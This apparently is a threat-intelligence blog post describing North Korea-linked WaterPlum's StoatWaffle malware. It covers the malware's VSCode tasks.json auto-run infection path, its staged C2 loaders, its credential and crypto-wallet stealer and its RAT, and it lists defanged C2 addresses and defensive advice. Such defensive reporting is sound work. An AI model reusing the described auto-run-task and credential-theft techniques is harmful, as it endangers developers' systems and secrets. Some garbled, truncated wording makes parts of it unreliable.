John
From out of nowhere, a hacking crew tied to North Korea – called WaterPlum – dropped a fresh piece of destructive code dubbed StoatWaffle. This tool spreads quietly through Visual Studio Code setups, sneaking in by abusing how much coders rely on public code libraries.
Behind it sits a subgroup known as Team 8, sharpening their methods in ways that feel different, more precise than before. What stands out now is how they twist everyday coding tools into backdoors, turning trusted environments risky for programmers across the globe. Danger grows not with loud blasts but slow shifts like these.
Threat Actor Background
Sometimes called Famous Chollima or PurpleBravo, WaterPlum runs cyber attacks tied to North Korea, chasing money and secrets. One after another, its operations pop up – like Contagious Interview – where coders get tricked by pretend jobs that slip malicious code onto their machines. Inside the group, separate teams move on their own rhythms, crafting different tools yet passing some hacking software between them now and then. Though split into parts, they still echo one another in how they strike.
Somewhere near the end of 2025, things began to change quietly. Instead of sticking with OtterCookie like before, Team 8 switched to something unfamiliar. Researchers at NTT Security Japan caught sight of it first – a fresh piece of malware lurking in their operations.
They decided to call it StoatWaffle. Behind the scenes, this move wasn’t random; it pointed straight back to ongoing work. The group keeps building new tools, swapping them fast enough to stay ahead. What used to be standard now feels outdated. A pattern emerges when you watch closely: evolution happens quickly here. Each step suggests preparation, not chance.
The VSCode Attack Path
Not what you’d expect: the StoatWaffle operation leans hard on hijacking Visual Studio Code’s built-in task system in clever, intricate ways. A fake code repo kicks things off – dressed up like a real blockchain toolkit – playing into how WaterPlum usually goes after finance folks.
Inside the repo sits a .vscode folder holding a custom tasks.json file. When the project opens, it runs hidden actions silently in the background. The runOn setting under runOptions activates when the folder loads into view.
This behavior uses standard VSCode functionality to streamline routine steps. Once the developer opens and accepts the instructions, the editor processes them immediately. No extra clicks or confirmations are required after trust is initially granted.
The task launches on its own simply because the environment meets certain conditions. Automation kicks in quietly, just like many built-in tools do during startup.
Right off the bat, confusion sets in – VSCode’s Workspace Trust feature asks if you vouch for a folder’s safety. Yt, developers often skip it, particularly when folders are pulled from what appear to be solid blockchain or financial tech sources.
Because of this habit, danger slips through; after approval lands, harmful scripts trigger the moment the directory opens, creeping into systems without a sound. Only then does silence become the problem?
Multi-Stage Infection Chain
Whatever the operating system, the automatic process grabs a payload from a Vercel-hosted app – a real cloud service – setting up a cross-platform start to the compromise. Once retrieved, that data flows straight into cmd.exe to run.
This initial piece of code does just one thing – pull down a follow-up file named vscode-bootstrap.cmd. What comes next begins with that script checking the ground it lands on, starting with a search for Node.js. When Node.js isn’t found, the system quietly grabs it straight from the main site. Its job? To lay out the needed tools for StoatWaffle while staying under notice
Once Node.js checks out, the bootstrap grabs a couple more pieces – env.npl and package.json – then runs env.npl straight through Node. Together, those bits kick off StoatWaffle’s main moving parts.
StoatWaffle Modular Design with Integrated Loading System
One part flows into another; StoatWaffle builds on Node.js with pieces that fit together like tools in a kit. This setup gives WaterPlum’s team room to shift how they operate whenever needed. Starting, it runs a two-phase loader – quiet at first, then active.
After that comes the Stealer, pulling data without drawing attention. Last in line is the RAT, which opens doors for remote control once inside.
Right off, env.npl kicks things by loading up StoatWaffle. It keeps checking in every five seconds, pinging /api/errorMessage on the C2. When that call fails, the reply gets pulled apart – whatever’s tucked inside runs straight as Node.js.
Five minutes passed before anything new showed up during the NSJ SOC watch. That delay hints at someone pulling strings behind the scenes, deciding when to send the next piece.
Another piece of code kicks off after the first one finishes.
Instead of stopping, it keeps checking in every five seconds – same server, different door: /api/handleErrors. When it hears back, whatever comes inside gets run straight away as Node.js work. Nothing lands on the hard drive here either.
Each step hides what’s truly coming next. Because no file has been saved yet, scanners looking for known bad patterns struggle to catch anything at this point.
Right when the second loader runs, the Stealer arrives at the same time as the RAT – both unfold without delay. One triggers, the other follows close behind. Not one before the other – they land together.
Stealer Module Targets Credentials on Multiple Platforms
A sneaky piece of software called StoatWaffle Stealer grabs login details on Windows, macOS, and Linux systems. Browser passwords form its main goal, especially those saved in Chrome-style apps, along with Firefox.
When someone uses Chrome, Edge, or similar browsers, the malware pulls saved passwords along with specific add-on details – this becomes risky if those add-ons handle crypto wallets.
In Firefox setups, it opens the extensions.json file to list active plugins, then scans for specific keywords associated with valuable tools before stealing anything. A secret vault on Mac computers is compromised when the Stealer module kicks into action. This built-in storage, called Keychain, holds login details, app codes, and digital certificates tightly tucked inside the OS.
Instead of stopping short, the tool digs deep, pulling out what was meant to stay locked away. Hidden credentials surface where they shouldn’t, exposed through precise system-level reac
Once gathered, files land in a temp folder on the infected machine with a scrambled name before being sent to the C2 via the /upload endpoint.
Another piece runs separately, scanning every program currently installed, then shoving that list into /uploadsecond, which arms WaterPlum with a clear map of what’s inside the target setup ahead of next moves.
StoatWaffle knows when it runs inside WSL. When active there, the Stealer part looks for signs of a Linux setup on Windows. Instead of moving forward unthinkingly, it pauses to confirm its surroundings first. Only then does it grab the current user’s Windows directory.
That string is fed into wslpath, a built-in tool, to turn it into something usable under Linux. With the path translated correctly, access shifts quietly across layers. What seems like separation becomes just another step in reach. Files meant to stay isolated suddenly sit within grasp. A script running in what feels like a container steps right through the wall.
RAT Module Executes Commands Remotely
A quiet signal wakes every few minutes, reaching toward /api/hsocketNext like a thread tugging at silence. From that pull comes a list of tasks whispered by someone far away. Once it hears what to do, the tool moves across the machine – careful, unseen – doing each step exactly. After finishing, it slips the outcome back through /api/hsocketResult, folding itself again into wait.
A single Node.js script lets WaterPlum run quietly inside hacked dev systems, linking back to its handlers. Through it, actions shift step by step – moving sideways across machines, pulling files, setting up next-stage tools – without standing out. Since real dev setups often run similar scripts, the malicious one slips through unnoticed. Control flows steadily, tucked behind normal-looking activity, hard to spot amid genuine processes.
IOC
| Indicator | Type |
|---|---|
| 185[.]163.125.196 | C2 IP Address |
| 147[.]124.202.208 | C2 IP Address |
| 163[.]245.194.216 | C2 IP Address |
| 66[.]235.168.136 | C2 IP Address |
| 87[.]236.177.9 | C2 IP Address |
Watch for traffic heading out toward these IP blocks, especially from build servers or dev machines. Blocking such addresses at the network edge helps reduce risk. Traffic patterns matter most when they link back to automated systems or code environments.
Mitigation and Defensive Recommendations
Out of nowhere, risky shortcuts creep into dev workflows when teams skip checking what hidden scripts lurk inside a new project’s .vscode folder. Think twice before saying yes to that prompt about trusting a workspace – especially if you didn’t build it yourself. A quiet red flag pops up whenever strange background processes start talking back outside normal hours. Watch how tools like tasks.json behave; they can sneak out data under the radar.
Some firms are now wiring alarms into their systems so every new node execution gets noticed instantly. Trust shouldn’t be automatic – it’s better earned than assumed by default. Behind each launch.json file could be a chain reaction waiting to trigger. Monitoring kicks in where habits fall short, catching odd patterns no checklist would spot. Security gaps widen fastest during moments of convenience. Quiet checks today prevent loud breaches tomorrow.
Since WaterPlum keeps aiming at blockchain coders, crypto companies, and fintech teams, folks in those areas ought to eye random repo invites, GitHub collab pings, or contract gigs more warily. Before loading any code into VSCode, check where it really came from – also scan the auto-run scripts tucked inside. Making that routine sharpens how devs guard their work.
Ongoing Threat Landscape
StoatWaffle shows up right on schedule, fitting WaterPlum’s habit of swapping out tools while always pushing ahead with fresh versions. Not long ago, it was OtterCooki; then came OtterCand. Now, with this latest shift, it points to a pattern built around speed and adaptation.
Software coders keep landing in the crosshairs, drawn in through familiar workflows they trust without question. Attack methods targeting Visual Studio Code have multiplied lately, as seen in operations such as GlassWorm and the combination of Anivia with OctoRAT.
What hides inside everyday coding environments often slips past guards, making these spaces quiet but dangerous openings for intrusions. IDEs sit at the edge of attention, overlooked even as threats grow sharper and more focused beneath the surface.
FAQ
A sneaky script runs as soon as someone opens a dodgy project folder – thanks to how tasks.json handles startup actions in VSCode. The trick hides inside what looks like normal behavior, firing off harmful code without warning.
A thief inside your browser grabs passwords first. Next it pulls out crypto wallets saved by extensions. Secrets tucked away in macOS Keychain get pulled too. Software you have installed gets listed without warning. All of it travels straight to remote servers run by hackers.
Site: thecybrdef.com
